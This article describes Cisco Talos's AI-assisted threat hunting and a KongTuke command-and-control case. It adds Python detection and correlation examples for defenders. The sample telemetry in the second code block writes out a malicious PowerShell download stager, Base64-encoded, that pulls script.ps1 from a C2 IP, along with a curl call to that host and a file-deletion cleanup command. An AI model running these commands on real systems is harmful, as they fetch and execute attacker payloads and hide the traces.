How Cisco Talos Uses AI and Analysts to Find Stealthy Threats
Cisco Talos runs continuous hypothesis-driven hunts that combine AI models and human analysts to detect threats that bypass standard alerts, recently linking firewall and endpoint logs to find KongTuke C2.
Cisco Talos operates a threat-hunting service that runs continuous searches based on hypotheses about attacker behavior. The program combines automated models and human analyst review to identify malicious activity that does not trigger conventional alerts. Talos draws its hypotheses from threat intelligence, incident response work and telemetry from nearly 50 million sensors.
Talos builds hunts that ask how a given adversary technique would appear in specific telemetry. The hunts run across firewall, DNS and endpoint data and look for patterns such as HTTP calls using Python user-agent strings to low-reputation hosting networks, MSIEXEC user-agent connections consistent with living-off-the-land installers, domains with algorithmic characteristics identified by statistical models, outbound traffic to historically malicious autonomous systems, and application or user-agent behavior that deviates from an environment baseline. When endpoint tools detect a new malicious process or file, Talos searches network logs for matching indicators across customers.
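The hunt patterns listed above map directly onto checks over normalised telemetry. The Python below is an added example, not Talos code: it encodes five of the hypotheses as functions over a handful of constructed firewall and DNS records and returns the candidate set an analyst would review. The ASN reference sets (drawn from the RFC 5398 documentation range), the entropy-plus-vowel-ratio heuristic that stands in for Talos's statistical domain models, and the "Windows Installer" user-agent string used to spot msiexec fetches are all assumptions made for the example.

```python
import math
from collections import Counter

# Constructed sample records (not real customer telemetry). Fields mimic a
# normalised firewall connection log and DNS query log.
FIREWALL_EVENTS = [
    {"host": "ws-01", "dst_ip": "203.0.113.10", "dst_asn": 64500,
     "user_agent": "python-requests/2.31.0", "url": "/api/beacon"},
    {"host": "ws-02", "dst_ip": "198.51.100.7", "dst_asn": 64501,
     "user_agent": "Windows Installer", "url": "/pkg/update.msi"},
    {"host": "ws-03", "dst_ip": "192.0.2.5", "dst_asn": 64502,
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "url": "/"},
    {"host": "ws-04", "dst_ip": "192.0.2.9", "dst_asn": 64503,
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "url": "/news"},
    {"host": "ws-05", "dst_ip": "192.0.2.5", "dst_asn": 64502,
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "url": "/"},
    {"host": "ws-06", "dst_ip": "203.0.113.44", "dst_asn": 64502,
     "user_agent": "CustomAgent/0.1", "url": "/c"},
]
DNS_EVENTS = [
    {"host": "ws-01", "qname": "xk3jq9z7plvwq2.com"},
    {"host": "ws-04", "qname": "www.example.com"},
    {"host": "ws-02", "qname": "updates.microsoft.com"},
]

# Assumed reference sets a hunter would load from threat intelligence. The ASNs
# are from the range reserved for documentation and stand in for real lists.
LOW_REPUTATION_ASNS = {64500}
HISTORICALLY_MALICIOUS_ASNS = {64503}


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def looks_algorithmic(qname, min_len=10, min_entropy=3.0, max_vowel_ratio=0.3):
    """Cheap stand-in for a DGA classifier: long, high-entropy, vowel-poor label."""
    labels = qname.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return False
    label = labels[-2]  # registrable label; a real hunt would use the public suffix list
    if len(label) < min_len:
        return False
    vowel_ratio = sum(ch in "aeiou" for ch in label) / len(label)
    return shannon_entropy(label) >= min_entropy and vowel_ratio <= max_vowel_ratio


def hunt_python_user_agent(events):
    """Python HTTP clients talking to low-reputation hosting networks."""
    return [e for e in events
            if e["user_agent"].lower().startswith(("python-", "python/"))
            and e["dst_asn"] in LOW_REPUTATION_ASNS]


def hunt_msiexec_user_agent(events):
    """msiexec fetching a remote package: the living-off-the-land installer pattern."""
    return [e for e in events if e["user_agent"] == "Windows Installer"]


def hunt_malicious_asn(events):
    """Outbound traffic to autonomous systems with a malicious history."""
    return [e for e in events if e["dst_asn"] in HISTORICALLY_MALICIOUS_ASNS]


def hunt_user_agent_outliers(events, min_hosts=2):
    """Baseline deviation: a user-agent seen from fewer than min_hosts hosts."""
    hosts_by_ua = {}
    for e in events:
        hosts_by_ua.setdefault(e["user_agent"], set()).add(e["host"])
    return [e for e in events if len(hosts_by_ua[e["user_agent"]]) < min_hosts]


def hunt_algorithmic_domains(dns_events):
    return [e for e in dns_events if looks_algorithmic(e["qname"])]


def run_hunts(fw_events, dns_events):
    """Return (hunt_name, host, detail) triples: the reduced candidate set for review."""
    findings = []
    for name, hits in [
        ("python_ua_low_rep_asn", hunt_python_user_agent(fw_events)),
        ("msiexec_ua", hunt_msiexec_user_agent(fw_events)),
        ("malicious_asn", hunt_malicious_asn(fw_events)),
        ("ua_baseline_deviation", hunt_user_agent_outliers(fw_events)),
    ]:
        findings += [(name, e["host"], f'{e["dst_ip"]} {e["user_agent"]}') for e in hits]
    findings += [("algorithmic_domain", e["host"], e["qname"])
                 for e in hunt_algorithmic_domains(dns_events)]
    return findings


if __name__ == "__main__":
    for finding in run_hunts(FIREWALL_EVENTS, DNS_EVENTS):
        print(*finding)
```

Each function is one hypothesis; the point of keeping them separate is that a hit from any single hunt is only a candidate, and the baseline-deviation hunt in particular will overlap with the others and needs the analyst review the article describes before it means anything.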
A customer engagement this year illustrates the cross-domain approach. Cisco Secure Firewall logs recorded a device contacting 144.31.221.82 on port 6060 with a URL path of /capcha9856, a pattern associated with traffic-direction redirects used to reach payload hosts. Endpoint telemetry for the same device showed a cmd.exe process spawning PowerShell with an -EncodedCommand parameter (the argument is the Base64 encoding of the UTF-16LE command text, so it must be decoded as such before it can be read). The decoded command ran Invoke-WebRequest to download a file named script.ps1 into the user's ApplicationData folder. A separate curl.exe process reached the same IP address, and subsequent Remove-Item commands attempted to delete the downloaded script. Correlating the firewall and endpoint traces led analysts to identify the activity as KongTuke command-and-control traffic and to document evidence of post-compromise cleanup.
After confirming the activity, analysts used process hashes and file paths from endpoint data to search the wider customer environment. Those searches produced additional matches that defined the scope of the compromise. Talos reported confirmed findings to the customer with details of what was observed, mappings to MITRE ATT&CK techniques, and recommended remediation steps.
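The correlation and scoping steps in the two paragraphs above, as an added example in Python that is not Talos's tooling. It constructs a few firewall log lines plus endpoint process and file events (the IP, port and URL path are the ones from the case; the hostnames, timestamps, exact PowerShell payload, curl arguments, file hashes and event format are assumptions), decodes the -EncodedCommand argument, joins endpoint command lines to firewall destinations per host, flags the Remove-Item cleanup on a host already tied to the C2 address, and then scopes the compromise across other hosts by file hash and by the dropped file's path under the user profile.

```python
import base64
import re
from collections import defaultdict

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# PowerShell accepts -e, -ec, -enc and -EncodedCommand; require whitespace after
# the switch so -ExecutionPolicy is not mistaken for it.
ENC_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
USER_PROFILE = re.compile(r"^C:\\Users\\[^\\]+\\", re.I)


def encode_ps(cmd: str) -> str:
    """-EncodedCommand takes Base64 of the UTF-16LE command text. Used here only to
    build the constructed sample, so the decoder gets realistic input."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded PowerShell text, or None if no encoded command is present."""
    m = ENC_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed sample telemetry (assumed format; not real customer data).
STAGER = ("Invoke-WebRequest -Uri http://144.31.221.82:6060/capcha9856 "
          "-OutFile $env:APPDATA\\script.ps1")
FIREWALL_LOG = [
    "2025-05-02T10:14:03Z host=ws-17 dst=144.31.221.82 dport=6060 url=/capcha9856",
    "2025-05-02T10:14:09Z host=ws-17 dst=144.31.221.82 dport=6060 url=/capcha9856",
    "2025-05-02T10:20:41Z host=ws-03 dst=192.0.2.10 dport=443 url=/",
]
ENDPOINT_EVENTS = [
    {"ts": "2025-05-02T10:14:02Z", "host": "ws-17", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_ps(STAGER)},
    {"ts": "2025-05-02T10:14:08Z", "host": "ws-17", "parent": "cmd.exe", "image": "curl.exe",
     "cmdline": "curl.exe -s http://144.31.221.82:6060/capcha9856"},
    {"ts": "2025-05-02T10:15:30Z", "host": "ws-17", "parent": "powershell.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -Command Remove-Item $env:APPDATA\\script.ps1 -Force"},
    {"ts": "2025-05-02T10:21:00Z", "host": "ws-03", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -Command Get-Date"},
]
# Placeholder hashes; a second host carries the same dropped file.
FILE_EVENTS = [
    {"host": "ws-17", "path": "C:\\Users\\alice\\AppData\\Roaming\\script.ps1", "sha256": "3f1c" * 16},
    {"host": "ws-22", "path": "C:\\Users\\bob\\AppData\\Roaming\\script.ps1", "sha256": "3f1c" * 16},
    {"host": "ws-03", "path": "C:\\Users\\carol\\AppData\\Roaming\\notes.txt", "sha256": "9e2b" * 16},
]


def parse_fw(line: str) -> dict:
    ts, rest = line.split(" ", 1)
    rec = dict(kv.split("=", 1) for kv in rest.split())
    rec["ts"] = ts
    return rec


def correlate(fw_lines, ep_events):
    """Join endpoint command lines to firewall destinations per host. Returns
    {host: {"c2_ips": set, "downloads": [...], "cleanup": [...]}} for hosts where a
    (decoded) command line references an IP the firewall saw that host contact."""
    fw_dst = defaultdict(set)
    for rec in map(parse_fw, fw_lines):
        fw_dst[rec["host"]].add(rec["dst"])
    findings = {}
    for ev in ep_events:
        decoded = decode_encoded_command(ev["cmdline"])
        text = ev["cmdline"] + (" " + decoded if decoded else "")
        hit = {ip for ip in IPV4.findall(text) if ip in fw_dst[ev["host"]]}
        if hit:
            f = findings.setdefault(ev["host"], {"c2_ips": set(), "downloads": [], "cleanup": []})
            f["c2_ips"] |= hit
            f["downloads"].append(decoded or ev["cmdline"])
    # Remove-Item on a host already tied to the C2 address is post-compromise cleanup.
    for ev in ep_events:
        if ev["host"] in findings and "remove-item" in ev["cmdline"].lower():
            findings[ev["host"]]["cleanup"].append(ev["cmdline"])
    return findings


def scope(file_events, seed_host):
    """Other hosts carrying the same file hash, or the same file path relative to
    the user profile, as the confirmed host."""
    seed = [f for f in file_events if f["host"] == seed_host]
    hashes = {f["sha256"] for f in seed}
    rel_paths = {USER_PROFILE.sub("", f["path"]).lower() for f in seed}
    return sorted({f["host"] for f in file_events if f["host"] != seed_host
                   and (f["sha256"] in hashes
                        or USER_PROFILE.sub("", f["path"]).lower() in rel_paths)})


if __name__ == "__main__":
    confirmed = correlate(FIREWALL_LOG, ENDPOINT_EVENTS)
    for host, f in confirmed.items():
        print(host, sorted(f["c2_ips"]), len(f["downloads"]), "downloads", len(f["cleanup"]), "cleanup")
        print("  also affected:", scope(FILE_EVENTS, host))
```

The join key here is host plus destination IP; in practice the firewall record carries the client's source IP rather than a hostname, so the endpoint agent's IP-to-host mapping at that timestamp is the first thing to verify before trusting the correlation. Decoding the encoded command before IP extraction is what makes the first endpoint event match at all; the raw command line contains no IP.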
The hunting operation follows a hybrid model. An AI engine runs hundreds of hunt hypotheses around the clock, applying models for domain-generation detection, behavioral baselining and anomaly scoring to reduce telemetry to a smaller set of candidates. Human analysts review those candidates, correlate across data sources, apply knowledge of the customer environment and determine whether the behavior is malicious. Confirmed findings are delivered as written reports rather than raw alerts.
Talos also evaluates each confirmed finding for detection gaps. When a gap is identified, analysts may recommend rule tuning, sensor configuration changes or policy adjustments, and some findings are incorporated into product-level detection. Customers with mature security operations receive hunting coverage for areas their teams may not probe; customers with smaller teams receive hunting capability and validated incident reports that include remediation guidance.